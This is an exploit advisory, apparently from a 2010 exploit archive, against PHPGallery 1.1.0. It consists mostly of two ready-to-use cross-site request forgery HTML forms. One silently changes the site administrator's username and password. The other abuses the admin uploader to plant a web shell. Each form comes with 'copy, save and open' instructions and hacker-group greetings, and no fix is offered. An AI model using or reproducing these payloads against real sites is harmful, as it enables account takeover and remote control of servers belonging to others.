PHPGallery 1.1.0 CSRF Vulnerability
2010-11-19 03:15:11-------------------------------------------------------------------------
# Software : phpgallery v 1.1.0 :
# Author : Or4nG.M4N
# Date : n/a
# Dork : Forbidden
# Software Link: http://www.hotscripts.com/listing/phpgallery/ :
-------------------------------------------------------------------------
+---+[REMOTE CSRF Change Admin Password by OR4NG.M4N]+---+
<html>
<head>
<title>REMOTE CSRF Change Admin Password by OR4NG.M4N</head>
<body>
<form action="http://domain/[pwd]/admin/do_change_info.php" method="post">
<br>
<input name="username" id="username" type="text" value="Or4nG" >
<br>
<input name="password" id="password" type="password" value="Ro0t" >
<br>
<input name="submit" onclick="MM_validateForm('username','','R','password','','R');return document.MM_returnValue" value="Submit" type="submit">
how to use: copy This code and seve in file csrf.html > and open Enjoy
+---+[REMOTE CSRF upload ShElL by OR4NG.M4N]+---+
<html>
<head>
<title>REMOTE CSRF upload ShElL by OR4NG.M4N</head>
<body>
<form enctype="multipart/form-data" action="http://domain/[pwd]/admin/uploader.php" method="POST">
Choose a file to upload to the gallery:<br>
<input name="uploadedfile" type="file" />
<p align="left">Picture Caption:<br>
<input name="caption" type="text" id="caption" size="45">
<p align="left">
<input name="Submit" type="submit" id="Submit" onClick="MM_showHideLayers('loading','','show')" value="Upload File" />
how to use: copy This code and seve in file csrf.html > and open Enjoy
--------------------------------------------------------
# Email - [email protected]
# GreeTz 2 - i-Hmx - Demetre - SadhacKer - The injector ]
# P0c TeaM - SarBoT511 - YoU - RGH - MY ]
# Home - www.v4-team.com - p0c.cc - inj3ct0r.com ]
---------------------------------------------------------
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.